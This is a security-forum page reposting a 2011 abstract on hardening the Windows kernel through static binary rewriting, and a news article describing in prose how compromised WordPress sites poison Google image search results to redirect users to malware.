bunuri virtuale disponibile în cadrul re?elei. Sursa: Facebook te pl

Securing The Kernel via Static Binary Rewriting and Program Shepherding Piotr Bania [: www.piotrbania.com :] 2011 Abstract Recent Microsoft security bulletins show that kernel vulnerabilities are becoming more and more important security threats. Despite the pretty extensive security mitigations many of the kernel vulnerabilities are still exploitable. Successful kernel exploitation typically grants the attacker maximum privilege level and results in total machine compromise. To protect against kernel exploitation, we have developed a tool which statically rewrites the Microsoft Windows kernel as well as other kernel level modules. Such rewritten binary files allow us to monitor control flow transfers during operating system execution. At this point we are able to detect whether selected control transfer flow is valid or should be considered as an attack attempt. Our solution is especially directed towards preventing remote kernel exploitation attempts. Additionally, many of the local privilege escalation attacks are also blocked (also due to additional mitigation techniques we have implemented). Our tool was tested with Microsoft Windows XP, Windows Vista and Windows 7 (under both virtual and physical machines) on IA-32 compatible processors. Our apparatus is also completely standalone and does not require any third party software. Download: http://www.piotrbania.com/all/articles/pbania-securing-the-kernel2011.pdf

Poisoned Google image searches becoming a problem Posted on 06 May 2011. If you are a regular user of Google's search engine you might have noticed that poisoned search results have practically become a common occurrence. Google has, of course, noticed this and does its best to mark the offending links as such, but it still has trouble when it comes to cleaning up its image search results. ISC's Bojan Zdrnja took it upon himself to explain how the attackers actually do it, and shows that it is actually rather simple. For one, they attack and compromise a great variety of legitimate websites - usually those which use Wordpress, since it often has vulnerabilities that can be easily exploited and the legitimate users are often lax when it comes to updating it. Then, they introduce PHP scripts in the sites' source code. "These scripts vary from simple to very advanced scripts that can automatically monitor Google trend queries and create artificial web pages containing information that is currently interested. That is actually how they generate new content – if you ever wondered how they had those web sites about Bin Laden up quickly it is because they automatically monitor the latest query trends and generate web pages with artificial content," he explains. They also harvest other sites for images, and embed them into the site. When the scripts detect Google's crawlers, they deliver to them pages containing the automatically generated content, and the pictures end up in the image search database. "The exploit happens when a user clicks on the thumbnail," says Zdrnja. "Google now shows a special page that shows the thumbnail in the center of the page, links to the original image (no matter where it is located) on the right and the original web site (the one that contained the image) in the background." Google displays all of this in an iframe, and the browser automatically sends the request to the compromised page. The PHP script inserted in it checks if the user has come from a Google results page, and if he did, it displays another script - this time it's a JavaScript one - that redirects the browser to another compromised site that serves malware. Users should be careful on what they click, but sometimes it is hard to detect malicious links. Zdrnja advises the use of browser add-ons such as the NoScript for the Firefox browser, but believes that Google could help by not using an iframe to display the results. More on Google image poisoning http://isc.sans.edu/diary/More+on+Google+image+poisoning/10822 Sursa: Poisoned Google image searches becoming a problem